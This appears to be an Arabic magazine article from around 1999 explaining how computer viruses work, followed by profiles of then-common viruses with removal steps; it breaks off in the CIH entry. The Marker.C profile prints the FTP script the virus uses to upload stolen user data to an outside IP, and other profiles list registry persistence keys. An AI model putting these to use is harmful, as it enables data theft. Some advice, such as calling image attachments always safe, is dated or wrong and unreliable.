كيف تعمل الفيروسات

الخطوة الأولى في مكافحة فيروسات الكمبيوتر، هي فهم أنواعها وآليات عملها

تتضمن معظم الكمبيوترات الشخصية المباعة حديثاً برامج لمكافحة الفيروسات، وهذه الحقيقة، أكثر من أي شيء آخر، تدلنا على مدى انتشار الفيروسات، ومدى قبول صناعة الكمبيوتر بها، كقدر لا مفر منه! لقد أصبحت الفيروسات أمراً واقعاً في عالم الكمبيوتر اليوم.

يوجد حالياً الآلاف من فيروسات الكمبيوتر، ويمكن تصنيفها إلى عدة فئات، لكنها جميعاً، على العموم، تخضع لتعريف مشترك بسيط: الفيروس هو برنامج كمبيوتر مصمم عمداً ليقترن ببرنامج آخر، بحيث يعمل الفيروس عندما يعمل ذلك البرنامج، ومن ثمَّ يعيد إنتاج نفسه باقترانه ببرامج أخرى. ويقترن الفيروس بالبرنامج الأصلي بإلصاق نفسه به، أو باستبداله أحياناً، وقد يغير الفيروس نفسه عند إعادة الإنتاج، فيظهر كنسخة معدلة عن النسخة التي قبلها، كلما كرر العملية. ويمكن أن تتلوث برامج الماكرو بالفيروس، أو قطاع الإقلاع (boot sector) على القرص، وهو أول برنامج يتم تحميله من قرص يحمل ملفات إقلاع نظام التشغيل.

لاحظ عبارة "مصمم عمداً" في التعريف، فالفيروسات لا تظهر صدفة، بل يكتبها مبرمجون ذوو مهارات عالية عادة، ثم يجدون طريقة لنشرها في أجهزة المستخدمين الغافلين عنها. وكلما أصبحت برامج مكافحة الفيروسات أقوى، زاد المبرمجون من جهودهم لتطوير فيروسات أذكى، للتحايل عليها. والهدف من تطوير الفيروسات، بالنسبة للكثير من مؤلفيها، ليس أكثر من تحد، والرغبة في إثبات تفوقهم، بينما هو للبعض الآخر التلذذ بإثارة حيرة الآخرين وشكوكهم في الكمبيوتر، أو إزعاجهم، وحتى إيذائهم! وهذا أمر سيئ جداً، إذ يمكنهم أن يجنوا أموالاً طائلة، إذا وجهوا مواهبهم لمساعدة الشركات على حل مشكلة العام 2000، بدلاً من هدرها في أعمال لا طائل منها، مثل تطوير الفيروسات.

اشتهرت فيروسات الكمبيوتر بقدرتها على الأذى وإحداث الأضرار، لكن في الحقيقة، فإن الكثير منها غير مؤذ. صحيح أن بعضها يحذف الملفات، أو يقوم بأعمال تخريبية أخرى، لكن معظمها يسبب إزعاجاً بسيطاً فقط، وبعضها لا يلحظه المستخدم العادي أبداً. ويكفي أن يتمكن البرنامج من إعادة إنتاج نفسه حتى يعتبر فيروساً، بغض النظر عن الأعمال التي ينفذها.

لكن، في الحقيقة، حتى الفيروسات غير المؤذية، تسبب بعض الأذى! فهي تستهلك مساحات تخزين على القرص، وجزءاً من ذاكرة الكمبيوتر، وتشغل جزءاً من طاقة المعالج، وبالتالي فهي تؤثر على سرعة وكفاءة الجهاز. أضف إلى ذلك، أن برامج كشف الفيروسات وإزالتها، تستهلك أيضاً موارد الجهاز. ويرى الكثير من المستخدمين، أن برامج مكافحة الفيروسات تبطئ عمل الجهاز بشكل ملحوظ، وهي أكثر تطفلاً عليه من الفيروسات ذاتها! وبعبارة أخرى، تؤثر الفيروسات في عالم الكمبيوتر، حتى إذا لم تكن تفعل شيئاً.

الفيروسات وأشباه الفيروسات

إن الشرح المذكور في الفقرة السابقة عن الفيروس، أكثر تحديداً من الطريقة التي نستخدم فيها كلمة "فيروس" في الواقع. وتوجد أنواع أخرى من البرامج، ينطبق عليها تعريف الفيروس جزئياً. تشترك هذه الأنواع مع الفيروسات في أنها تعمل بدون علم المستخدم، وتقوم بأعمال ضمن الكمبيوتر، مصممة عمداً لتنفيذها. ومن هذه الأنواع: الديدان (worms)، وأحصنة طروادة (Trojan horses)، وبرامج الإنزال (droppers). وتعتبر كل هذه البرامج، بما فيها الفيروسات، جزءاً من فئة أكبر تدعى البرامج الماكرة (malware)، وهي مشتقة من عبارة malicious-logic software.

والدودة برنامج يعيد إنتاج نفسه، لكنها لا تلوث برامج أخرى. تنسخ الدودة نفسها من وإلى الأقراص المرنة، أو عبر الشبكات، ويعتمد بعضها على الشبكة في إنجاز عملها. تستخدم إحدى أنواع الديدان -وهي الدودة المضيفة (host worm)- الشبكة لنسخ نفسها، فقط، إلى أجهزة الكمبيوتر المتصلة بالشبكة. بينما توزع الدودة الشبكية (network worm) أجزاءها على عدة كمبيوترات، وتعتمد على الشبكة فيما بعد لتشغيل هذه الأجزاء. ويمكن أن تظهر الديدان على كمبيوترات منفصلة، فتنسخ نفسها إلى أماكن متعددة على القرص الصلب.

وسمي النوع الثاني من البرمجيات الماكرة "حصان طروادة"، نسبة للأسطورة الإغريقية الواردة في ملحمة الأوديسا لهوميروس، حيث ترك الجيش الإغريقي حصاناً خشبياً ضخماً، كهدية لسكان طروادة، وكان يختبئ ضمنه مجموعة من الجنود الأشداء، بعد أن تظاهروا بإنهاء الحصار الطويل، وعندما رحل الجيش وأدخل السكان الحصان إلى داخل أسوار المدينة، خرج الجند منه وانقضوا على الحامية، وسقطت المدينة في أيدي الإغريق. وتعتمد برامج أحصنة طروادة على المبدأ ذاته، فهي تختبئ ضمن برامج يبدو مظهرها بريئاً، وعندما يشغّل المستخدم واحداً من هذه البرامج، ينشط الجزء الماكر ويقوم بعمل معين مصمم له. وتختلف أحصنة طروادة عن الفيروسات العادية، في أنها لا تعيد إنتاج نفسها.

وصممت برامج الإنزال (droppers) لمراوغة برامج مكافحة الفيروسات، وتعتمد على التشفير غالباً لمنع اكتشافها. ووظيفة هذه البرامج عادة، نقل وتركيب الفيروسات، فهي تنتظر لحظة حدوث أمر معين على الكمبيوتر، لكي تنطلق وتلوثه بالفيروس المحمول في طياتها.

وينتمي مفهوم قنبلة (bomb) الكمبيوتر إلى هذه الفئة، إذ تبنى القنابل ضمن البرمجيات الماكرة كواسطة لتنشيطها. وتبرمج القنابل لتنشط عند حدوث حدث معين. تنشط بعض القنابل في وقت محدد، اعتماداً على ساعة الكمبيوتر. فيمكن برمجة قنبلة مثلاً، لمسح كافة الملفات ذات الامتداد .DOC من قرصك الصلب، عشية رأس السنة الميلادية، أو لعرض رسالة على الشاشة، في اليوم المصادف لعيد ميلاد شخصية مشهورة. وتعمل بعض القنابل تحت شروط أو أحداث أخرى، فيمكن أن تنتظر القنبلة إلى أن يتم تشغيل برنامج معين، عشرين مرة مثلاً، وعندها تمسح ملفات القوالب (templates) الخاصة بهذا البرنامج. ومن وجهة النظر هذه، تعتبر القنابل مجرد برامج جدولة زمنية ماكرة.

ويمكننا النظر إلى الفيروسات كحالات خاصة من البرمجيات الماكرة، إذ يمكن للفيروسات الانتشار بواسطة برامج الإنزال (ولا يشترط ذلك)، وهي تستخدم مفهوم برامج الديدان لإعادة إنتاج نفسها. ولا تعتبر الفيروسات مماثلة لأحصنة طروادة من الناحية التقنية، إلا أنها تشابهها في نقطتين: فهي تنفذ أعمالاً لا يريدها المستخدم، وتحول البرنامج الذي تلتصق به إلى حصان طروادة عملياً (تختبئ داخله، وتعمل عندما يعمل البرنامج، وتنفذ أعمالاً غير مرغوبة).

كيف يعمل الفيروس؟

تعمل الفيروسات بطرق مختلفة، وسنعرض فيما يلي للطريقة العامة التي تنتهجها كافة الفيروسات. في البداية يظهر الكمبيوتر على جهازك، ويكون قد دخل إليه مختبئاً في ملف برنامج ملوث (مثل ملفات COM أو EXE أو قطاع الإقلاع). وكانت الفيروسات في الماضي تنتشر بشكل أساسي عن طريق توزيع أقراص مرنة ملوثة. أما اليوم، فمعظمها يأتي مع البرامج المنقولة عبر الشبكات (ومن بينها إنترنت)، كجزء من برنامج تركيب نسخة تجريبية من تطبيق معين، أو ماكرو لأحد التطبيقات الشهيرة، أو كملف مرفق (attachment) برسالة بريد إلكتروني.

ويجدر التنويه إلى أن رسالة البريد الإلكتروني نفسها لا يمكن أن تكون فيروساً، فالفيروس برنامج، ويجب تشغيله لكي يصبح نشطاً. إذاً الفيروس المرفق برسالة بريد إلكتروني، لا حول له ولا قوة، إلى أن تشغّله. ويتم تشغيل فيروسات المرفقات عادة، بالنقر عليها نقرة مزدوجة بالماوس. ويمكنك حماية جهازك من هذه الفيروسات، بالامتناع عن تشغيل أي ملف مرفق برسالة بريد إلكتروني، إذا كان امتداده COM أو EXE، أو إذا كان أحد ملفات بيانات التطبيقات التي تدعم الماكرو، مثل برامج أوفيس، إلى ما بعد فحصه والتأكد من خلوه من الفيروسات. أما ملفات الرسوميات والصوت، وأنواع ملفات البيانات الأخرى القادمة كمرفقات، فهي آمنة، ولا يمكن للفيروس أن ينشط من خلالها، ولذلك فهو لا يهاجمها.

إذاً يبدأ الفيروس دورة حياته على الجهاز بشكل مشابه لبرنامج حصان طروادة، فهو يختبئ في ثنايا برنامج أو ملف آخر، وينشط معه. في الملفات التنفيذية الملوثة، يكون الفيروس قد أضاف شيفرته إلى البرنامج الأصلي، وعدل تعليماته بحيث ينتقل التنفيذ إلى شيفرة الفيروس. وعند تشغيل الملف التنفيذي المصاب، يقفز البرنامج عادة إلى تعليمات الفيروس، فينفذها، ثم يعود ثانية لتنفيذ تعليمات البرنامج الأصلي. وعند هذه النقطة يكون الفيروس ناشطاً، وجهازك أصبح ملوثاً.

وقد ينفذ الفيروس مهمته فور تنشيطه (ويطلق عليه فيروس العمل المباشر direct-action)، أو يقبع منتظراً في الذاكرة، باستخدام وظيفة "الإنهاء والبقاء في الذاكرة" (terminate and stay resident, TSR)، التي تؤمنها نظم التشغيل عادة. وتنتمي غالبية الفيروسات لهذه الفئة، ويطلق عليها الفيروسات "المقيمة". ونظراً للإمكانيات الكبيرة المتاحة للبرامج المقيمة في الذاكرة، بدءاً من تشغيل التطبيقات والنسخ الاحتياطي للملفات إلى مراقبة ضغطات لوحة المفاتيح ونقرات الماوس (والكثير من الأعمال الأخرى)، فيمكن برمجة الفيروس المقيم، لتنفيذ أي عمل يمكن أن يقوم به نظام التشغيل، تقريباً. يمكن تشغيل الفيروس المقيم كقنبلة، فيبدأ مهمته على جهازك عند حدث معين. ومن الأمور التي تستطيع الفيروسات المقيمة عملها، مسح (scan) قرصك الصلب وأقراص الشبكة بحثاً عن الملفات التنفيذية، ثم نسخ نفسها إلى هذه الملفات وتلويثها.

أنواع الفيروسات

يبحث مطورو الفيروسات، بشكل دائم، عن طرق جديدة لتلويث كمبيوترك، لكن أنواع الفيروسات معدودة عملياً، وتصنف إلى: فيروسات قطاع الإقلاع (boot sector viruses)، وملوثات الملفات (file infectors)، وفيروسات الماكرو (macro viruses). وتوجد أسماء أخرى لهذه الفئات، وبعض الفئات المتفرعة عنها، لكن مفهومها يبقى واحداً.

تقبع فيروسات قطاع الإقلاع في أماكن معينة على القرص الصلب ضمن جهازك، وهي الأماكن التي يقرأها الكمبيوتر وينفذ التعليمات المخزنة ضمنها، عند الإقلاع. تصيب فيروسات قطاع الإقلاع الحقيقية منطقة قطاع الإقلاع الخاصة بنظام دوس (DOS boot record)، بينما تصيب فيروسات الفئة الفرعية المسماة MBR viruses، قطاع الإقلاع الرئيسي للكمبيوتر (master boot record). يقرأ الكمبيوتر كلا المنطقتين السابقتين من القرص الصلب عند الإقلاع، مما يؤدي إلى تحميل الفيروس في الذاكرة. يمكن للفيروسات أن تصيب قطاع الإقلاع على الأقراص المرنة، لكن الأقراص المرنة النظيفة، والمحمية من الكتابة، تبقى أكثر الطرق أمناً لإقلاع النظام، في حالات الطوارئ. والمشكلة التي يواجهها المستخدم بالطبع، هي كيفية التأكد من نظافة القرص المرن، أي خلوه من الفيروسات، قبل استخدامه في الإقلاع، وهذا ما تحاول أن تفعله برامج مكافحة الفيروسات.

تلصق ملوثات الملفات (وتدعى أيضاً الفيروسات الطفيلية parasitic viruses) نفسها بالملفات التنفيذية، وهي أكثر أنواع الفيروسات شيوعاً. وعندما يعمل أحد البرامج الملوثة، فإن هذا الفيروس، عادة، ينتظر في الذاكرة إلى أن يشغّل المستخدم برنامجاً آخر، فيسرع عندها إلى تلويثه. وهكذا، يعيد هذا النوع من الفيروس إنتاج نفسه، ببساطة، من خلال استخدام الكمبيوتر بفعالية، أي بتشغيل البرامج! وتوجد أنواع مختلفة من ملوثات الملفات، لكن مبدأ عملها واحد.

تعتمد فيروسات الماكرو (macro viruses)، وهي من الأنواع الحديثة نسبياً، على حقيقة أن الكثير من التطبيقات تتضمن لغات برمجة مبيتة ضمنها. وقد صممت لغات البرمجة هذه لمساعدة المستخدم على أتمتة العمليات المتكررة التي يجريها ضمن التطبيق، من خلال السماح له بإنشاء برامج صغيرة تدعى برامج الماكرو. تتضمن برامج طاقم أوفيس، مثلاً، لغة برمجة مبيتة، بالإضافة إلى العديد من برامج الماكرو المبيتة أيضاً، والجاهزة للاستخدام المباشر. وفيروس الماكرو ببساطة، هو برنامج ماكرو مصمم للعمل مع تطبيق معين، أو عدة تطبيقات تشترك بلغة برمجة واحدة. أصبحت فيروسات الماكرو شهيرة بفضل الفيروس المصمم لبرنامج مايكروسوفت وورد. فعندما تفتح وثيقة أو قالباً ملوثين، ينشط الفيروس ويؤدي مهمته التخريبية. وقد بُرمِج هذا الفيروس لينسخ نفسه إلى ملفات الوثائق الأخرى، مما يؤدي إلى ازدياد انتشاره مع استمرار استخدام البرنامج.

ويجمع نوع رابع يدعى الفيروس "متعدد الأجزاء" (multipartite) بين تلويث قطاع الإقلاع مع تلويث الملفات، في وقت واحد.

ستجد قائمة ضخمة بأسماء الفيروسات، مع شرح تفصيلي عن آثار كل منها، في قسم Virus Encyclopedia من موقع مختبر مكافحة الفيروسات، الخاص بشركة سيمانتك، على العنوان:

http://www.symantec.com/avcenter/vinfodb.html

ذكاء الفيروسات في ازدياد

نجح مبدأ فيروس الماكرو، لأن لغات البرمجة أمنت إمكانية الوصول إلى الذاكرة والأقراص الصلبة. وهذا ما أمنته التقنيات الحديثة أيضاً، بما فيها عناصر تحكم ActiveX، وبريمجات جافا (Java applets). صحيح أن هذه التقنيات صُممت مع ضمان حماية القرص الصلب من برامج الفيروسات (تعد جافا أفضل من ActiveX في هذا المجال)، لكن الحقيقة أن هذه البرامج تستطيع تركيب نفسها على جهازك بمجرد زيارتك لموقع ويب. ومن الواضح أن أجهزتنا ستكون أكثر عرضة لمخاطر الفيروسات والبرمجيات الماكرة الأخرى، مع ازدياد تشبيك الكمبيوترات ببعضها، وبشبكة إنترنت، خصوصاً مع المزايا التي تعدنا بها إنترنت لإجراء ترقية نظم التشغيل عبرها (يؤمن نظاما ويندوز98 وويندوز2000 هذه الإمكانيات).

إن أقل ما يوصف به مطورو الفيروسات، هو مهارتهم وقدرتهم الفذة على الابتكار، فهم يخرجون إلينا دائماً بطرق جديدة لخداع برامج مكافحة الفيروسات. فمثلاً، تضلل الفيروسات المتسللة (stealth viruses) الجديدة، برامج مكافحة الفيروسات، بإيهامها أن الأمور تسير على ما يرام، ولا يوجد أي مؤشر على وجود فيروس. كيف؟

يعتمد مبدأ عمل الفيروس المتسلل، على الاحتفاظ بمعلومات عن الملفات التي لوثها، ثم الانتظار في الذاكرة، ومقاطعة عمل برامج مكافحة الفيروسات خلال بحثها عن الملفات المعدلة، وإعطائها المعلومات القديمة التي يحتفظ بها عن هذه الملفات، بدلاً من السماح لها بالحصول على المعلومات الحقيقية من نظام التشغيل!

أما الفيروسات متغيرة الشكل (polymorphic viruses)، فتعدل نفسها أثناء إعادة الإنتاج، مما يجعل من الصعب على برامج مكافحة الفيروسات التي تبحث عن نماذج معينة من مثل هذا الفيروس، اكتشاف كافة أشكاله الموجودة، وبالتالي تستطيع الفيروسات الناجية، الاستمرار وإعادة إنتاج أشكال جديدة.

تظهر أنواع جديدة من الفيروسات إلى حيز الوجود بشكل دائم، مع استمرار لعبة القط والفأر بين مطوري الفيروسات ومنتجي برامج مكافحتها. وأغلب الظن أن الفيروسات ظهرت لتبقى، إلى ما شاء الله.

بعض الفيروسات الشائعة

 

= = =  =

 

أكثر الفيروسات انتشاراً

تضمن العدد السابق مقالة توضح المقصود بمصطلح "فيروسات الحواسيب"، أوضح طبيعة عملها وأنواعها، بهدف الوقاية منها ومكافحتها. ونتناول في ما يلي شرحاً عن الفيروسات العشرة الأكثر انتشاراً، حسب تصنيف الموقع http://vil.mcafee.com/villib/alpha.asp، لنلمس فعلياً ما تفعله الفيروسات المنتشرة حالياً، وندرك خطرها على أنظمة الحواسيب التي نستخدمها، فنستطيع الوقاية منها، أو التخلص منها في حالة إصابتنا بها.

ونذكر أنه يجب باستمرار استخدام واحداً من برامج اكتشاف وإزالة الفيروسات الشهيرة المتوفرة، كبرامج McAfee، أو Norton AntiVirus، أو Dr. Salamon، مع تحديثها دورياً، من مواقع الشركات المنتجة لها على شبكة إنترنت، لتبقى حواسيبنا "بصحة" جيدة.

1- الفيروس Cap

هو أحد فيروسات الماكرو لملفات وورد. ظهر عام 1997، ثم انتشر إلى درجة كبيرة. ويتألف من عشرة ماكرويات، يدعى أحدها CAP، وهو الذي يعطي الفيروس اسمه، وتستدعيه ماكرويات الفيروس التسعة الأخرى:

AutoExec,AutoOpen,FileSave, FileSaveAs, FileTemplates, ToolsMacro, FileClose, FileOpen, AutoClose.

يتضمن الفيروس التعليق التالي:

C.A.P: Un virus social.. y ahora digital.. '"j4cKy Qw3rTy"
(jqw3rty@hotmail.com). Venezuela, Maracay, Dic 1996.
P.D. Que haces gochito ? Nunca seras Simon Bolivar.. Bolsa !

وعندما يكرر ذاته، ينسخ أولاً، مجموعة الماكرويات العشرة الخاصة به، ثم يفحص عناصر قوائم أوامر محرر النصوص وورد، ويجمع أسماءها، التي تختلف من لغة إلى أخرى، ثم يعترض سبيل خمسة ماكرويات أخرى، بحيث يضيف إليها مؤشراً لتنفيذ الماكرو Cap، ويحذف أية ماكرويات موجودة في القالب العام Normal.dot، بالإضافة إلى أنه يحذف عنصرين من قائمة "أدوات" في البرنامج، هما: "ماكرو" و"تخصيص"، بينما يشل فعالية الأمر "قوالب ووظائف إضافية" في القائمة ذاتها. يستخدم الفيروس المعلومات الموجودة في حقل "الوصف"، (وهو الحقل الموجود في أسفل صندوق الحوار، الذي يظهر عند اختيار "أدوات/ماكرو/وحدات ماكرو") للتعرف على الماكرويات الخاصة به. يبدأ حقل الوصف فيها بالحرف F%، فيبدأ حقل الوصف للماكرو FileOpen، مثلاً، بالرموز F%O، وللماكرو FileSave بالرموز F%S. يعدل الفيروس إعدادات حفظ الوثائق، فيضبط الخيارات على الحفظ السريع، ويسمح بالحفظ التلقائي، مع الانتظار 10 دقائق بين مرات الحفظ التلقائي، ويسمح بحفظ التغيرات في القالب العام Normal.dot بدون تأكيد المستخدم.

يفحص الفيروس استخدام الماكرو FileSaveAs لتسجيل وثيقة، أو قالب، أو ملف RTF (Rich Text Format)، ويحول في جميع تلك الحالات، الملف الناتج إلى قالب ويلوثه بمجموعة ماكروياته.

يمكن، لإزالة الفيروس، استخدام أحد برامج اكتشاف وفحص الفيروسات الشهيرة، أو حذف ملف القالب العام NORMAL.DOT، للسماح لبرنامج وورد بإعادة إنشائه، عندما يعمل البرنامج في المرة التالية، وإلغاء تخصيص الفيروس لقائمة "أدوات"، بإعادة إظهار "ماكرو" و"تخصيص".

2 - الفيروس W97M.Ethan.A

وهو فيروس ماكرو لبرنامج وورد 97، ظهر في بداية هذا العام، وينتشر بسرعة كبيرة. يتألف من ماكرو واحد، ويبلغ طول شيفرته حوالي 50 سطراً، يحشرها في بداية وحدة ThisDocument، وهي الوحدة الافتراضية للغة VBA في قالب وثيقة وورد. يضيف الفيروس ذاته إلى القالب العمومي Normal.dot، لدى إغلاق وثيقة مصابة، ويصيب بعد ذلك، جميع الوثائق والقوالب التي يفتحها المستخدم، لأنه يصبح جزءاً من الوحدة ThisDocument. يستخدم الفيروس الملف النصي المؤقت المسمى C:\ethan.___ أثناء إصابة وثيقة أو قالب، ويضبط سماته (attributes) بحيث يكون ملف نظام مخفياً.

يمكن أن لهذا الفيروس، بإمكانية نسبتها 30%، أن يعدل خصائص وثيقة مصابة به، أثناء إغلاقها، فيصبح عنوان الوثيقة (Title) = "Ethan Frome"، واسم الكاتب (Author)= "EW/LN/CB" ، والكلمات الأساسية (Keywords) ="Ethan".

لهذا الفيروس سلوك آخر، هو أنه يحذف الملف Class.sys (الذي ينشأ عن الإصابة بفيروس W97M/Class) إذا اكتشف وجوده على القرص الصلب.

يجب لإزالته، استخدام أحد برامج اكتشاف الفيروسات الحديثة، ثم حذف الملف C:\Ethan___، وإعادة إدخال أي شيفرة مضافة إلى الوحدة البرمجية ThisDocument، لأن برنامج إزالة الفيروسات يزيلها من تلك الوحدة عند إزالة الفيروس ذاته.

3 - فيروس W97M/Marker.C

فيروس ماكرو لبرنامج وورد97، يصيب الوثائق والقوالب، ويلغي خيار الحماية من فيروسات الماكرو في برنامج وورد، والذي يمكن الوصول إليه من (أدوات/خيارات/عام). يحاول الفيروس الاحتفاظ بسجل يتضمن اسم المستخدم، وعنوانه، والوقت والتاريخ، ويحصل على تلك المعلومات من وورد، والتي تظهر باختيار (أدوات/خيارات/معلومات المستخدم)، ويضيفها كتعليق إلى نهاية شيفرته. إذا كان التاريخ هو الأول من الشهر، ينشئ الفيروس ملفاً على القرص C:\ له الامتداد .SYS ويبدأ بالحروف HSF تتبعها أربعة رموز مولدة عشوائياً، وينسخ إليه المعلومات التي سجلها عن المستخدم مع شيفرة الفيروس، ثم ينشئ ملفاً آخر يدعى C:\netldx.vxd يتضمن تعليمات لبرنامج نقل الملفات FTP.EXE، هي:

"o 209.201.88.110"
"user anonymous"
"pass itsme@"
"cd incoming"
"ascii"
"put " & LogFile
"quit"

يمثل LogFile متغيراً يشير إلى الملف من نوع .SYS الذي سجله على القرص الصلب، وينفذ برنامج FTP.EXE تعليمات الملف C:\netldx.vxd، الذي يرسل شيفرة الفيروس إلى موقع مؤلف الفيروس المدعو CodeBreaker على إنترنت، إلى العنوان 209.201.88.110، ويضبط قيمة المفتاح التالي في ملف التسجيل للنظام المصاب، بقيمة True:

"HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile"

وتكون هذه القيمة المنطقية false إذا لم يكن النظام مصاباً بالفيروس، وتصبحtrue بعد الإصابة به.

يحتاج اكتشاف وإزالة الفيروس إلى أحد البرامج الشهيرة لإزالة الفيروسات.

4 - الفيروس ATAKA (A.K.A. IE0199.EXE)

فيروس من نوع حصان طروادة، أرسل كملف مرفق بالبريد الإلكتروني إلى الكثير من المستخدمين، بعد تزوير عنوان البريد الإلكتروني للمرسل، ليبدو صادراً من شركة مايكروسوفت، وتتضمن رسالة البريد الإلكتروني إعلاماً بأن الملف المرفق المسمى IE0199.EXE، هو تحديث لبرنامج إنترنت إكسبلورر.

ينزل الفيروس عند تنفيذه أول مرة، ملفين، هما: MPREXE.DLL وSNDVOL.EXE في مجلد Windows\System، ويحذف الملف sndvol32.exe من الدليل Windows\System32، ويضيف اسم الملف MPREXE.DLL إلى مداخل برامج القيادة في قسم [boot] في ملف SYSTEM.INI. وهذا يؤدي إلى تحميل وتشغيل الملف MPREXE.DLL عند تشغيل النظام مرة أخرى، ويضيف المفاتيح التالية إلى ملف التسجيل:

HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\
Internet Settings\EnableAutodial="00,00,00,00"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\
Known16DLLs\mprexe.dll="mprexe.dll"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\
Known16DLLs\SNDVOL.EXE="SNDVOL.EXE"

يؤدي ذلك إلى تشغيل الملف SNDVOL.EXE بواسطة الملف MPREXE.DLL، مع بقائه مقيماً في الذاكرة، وهو يستهدف إغراق مزودات إنترنت معينة بطلبات اتصال TCP، وهي المزودات ذات العناوين: www.bct.bg، وwww.infotel.bg، وns.infotel.bg.

اتبع الخطوات التالية لإزالة الفيروس:

1 - أغلق النظام وأقلع في وضع دوس

2 - احذف الملفين SNDVOL.EXE، وMPREXE.DLL، من المجلد Windows\System.

3 - احذف الملف mprexe.dll فقط، من مدخل الأقراص في قسم [boot]، لملف SYSTEM.

4 - احذف المداخل التالية من ملف التسجيل:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\
Known16DLLs\mprexe.dll="mprexe.dll"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\
Known16DLLs\SNDVOL.EXE="SNDVOL.EXE"

5 - الفيروس URLSNOOP/Picture.exe

الاسم الشائع لهذا الفيروس Picture.exe، وهو من نوع حصان طروادة، وانتشر عبر البريد الإلكتروني غير المرغوب به (Spam)، حيث يرسل إلى كملف تنفيذي مرفق ببريد إلكتروني. تتم عند تشغيل هذا الفيروس، العلمية التالية: يعمل الملف MANAGER.EXE وليس Picture.exe، وينزل الملف NOTE.EXE (المماثل للملف PICTURE.EXE) في الدليل الفرعي لنظام التشغيل ويندوز، ويضيف اسمه NOTE.EXE إلى سطر RUN في ملف WIN.INI، مما يؤدي إلى تشغيل NOTE.EXE عند إقلاع النظام.

لدى تشغيل الملف NOTE.EXE يفحص وجود الملف $2321.dat ضمن دليل ويندوز، فإذا لم يكن موجوداً، فإنه يحاول أن ينشئ ملفاً مؤقتاً على الدليل C:\ باسم file0001.chk، فإذا نجح في ذلك، ينشئ لائحة بالملفات من النوع TXT وHTML الموجودة على الأقراص الصلبة للمستخدم، C:، وD:، وE:، … إلخ، حتى يصل إلى قرص لا يستطيع أن ينشئ عليه ملفاً، وهو عادة، القرص المدمج، ثم يسجل لائحة أسماء الملفات التي وجدها على ملف باسم $2321.dat، بتشفير البيانات بحيث يضيف 5 إلى كل حرف ASCII يسجله، وينهي تشغيله. فإذا كان المستخدم يملك برنامج زبون لشركة ALO على جهازه، فإن الفيروس ينظر أيضاً داخل الملف C:\AOL\DB\MAIN.IDX، الذي يتضمن اسم المستخدم وكلمة السر، مع احتمال إرسالها إلى مبرمج الفيروس. وعندما يعمل الملف MANAGER.EXE، ثانية، يحاول الفيروس إرسال الملفين $2321.dat، و$4135.dat إلى بريد إلكتروني موجود في الصين!

6 - W32/Ska (A.K.A Happy99.exe)

فيروس من نوع دودة، أرسل أول مرة إلى عدد من مجموعات الأخبار، يوجد ضمن ملف باسم Happy99.exe، يظهر عند تشغيله رسالة على الشاشة تهنيء بحلول السنة الميلادية 1999: Happy New Year 1999، مع رسوم لألعاب نارية. كان سبب تكاثره الرئيسي تبادله ضمن مجموعات الأخبار، لكنه يمكن أن ينشر ذاته أيضاً، بالتصاقه برسائل البريد الإلكتروني، وإرساله كملف مرفق، بدون علم المستخدم، واعتبر دودة بسبب هذا السلوك. يصيب الفيروس الجهاز عند تسلم رسالة بريد إلكتروني مع ملف مرفق يدعى Happy99.exe، يرسله الفيروس بدون علم المستخدم المرسل. وبمجرد تشغيل الملف Happy99.exe، تظهر رسوم ألعاب نارية على شاشة المستخدم، وينسخ ذاته إلى مجلد النظام Windows\System تحت الاسم SKA.EXE، ثم يفك من داخله ملف من نوع DLL باسم SKA.DLL ويحفظه في المجلد Windows\System، إذا لم يكن موجوداً.

يعد الملف SKA.EXE نسخة من الملف الأصلي، لكنه لا يعمل مثل الملف Happy.EXE، ولهذا فهو لا ينسخ ذاته مرة أخرى ولا يظهر ألعاباً نارية على شاشة المستخدم.

تفحص هذه الدودة بعد ذلك وجود الملف WSOCK32.SKA في المجلد Windows\System. فإذا لم يكن موجوداً وكان الملف WSOCK32.DLL موجوداً، فإنها تنسخ الملف WSOCK32.DLL على WSOCK32.SKA.

تنشئ الدودة بعد ذلك، المفتاح التالي في ملف التسجيل:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Ska.exe="Ska.exe"

والذي يؤدي إلى تشغيل الملف SKA.EXE في المرة التالية التي يعمل فيها نظام التشغيل. وعندما يحدث هذا تلتصق الدودة بالملف WSOCK32.DLL، وتضيف علاقات إلى الوظائف المصدرة EnumProtocolsW، وWSAAsyncGetProtocolByName.

تستدعي الشيفرة الملصوقة وظيفتين من ملف SKA.DLL تدعيان mail، وnews، تسمحان للدودة بالالتصاق في رسائل البريد الإلكتروني SMTP، وفي الرسائل الموجهة إلى مجموعات الأخبار.

7 - فيروس Laroux

فيروس ماكرو لبرنامج إكسل، ظهر في صيف 1996، مكتوب بلغة VBA، يصبح فعالاً حالما يحمل برنامج إكسل المصاب به، وينقل العدوى إلى أي مصنف إكسل يفتحه المستخدم. يتألف من ماكرويين هما auto_open وcheck_files. يتم تنفيذ الماكرو auto_open كلما تم فتح جدول ممتد مصاب بالفيروس، وينفذ بعده ماكرو check_files، الذي يفحص مسار إقلاع إكسل. فإذا لم يجد فيه ملفاً باسم PERSONAL.EXE، فإنه ينشئه وينسخ إليه وحدة برمجية باسم laroux.

الملف PERSONAL.EXE هو الملف الافتراضي لأي ماكرو مسجل في إكسل، وهكذا يمكن أن يوجد هذا الملف على نظامك على الرغم من أنه قد لا يكون مصاباً بهذا الفيروس. يكون مسار إقلاع إكسل، عادة، \Micorsoft\Excel\Xlstart، ولكن يمكن تغييره من "أدوات/خيارات/عام/موقع ملف بدء التشغيل البديل". لا يسبب هذا الفيروس أضراراً، سوى أنه يكرر ذاته في جميع الملفات التي يتم فتحها ببرنامج إكسل مصاب.

8- فيروس W32.CIH

ظهرت عائلة هذا الفيروس في يونيو 1998، من جنوب شرق آسيا، وتوجد منه حالياً، ثلاثة نماذج معروفة، وهو منتشر على نطاق واسع، ويصيب ملفات ويندوز95 من هيئة PE، ويستطيع أن يقسم شيفرته إلى عدة أجزاء ويضعها في الأجزاء غير المستخدمة من الملفات المصابة، حيث تتضمن ملفات PE، عادة، الكثير من المساحة غير المستخدمة.

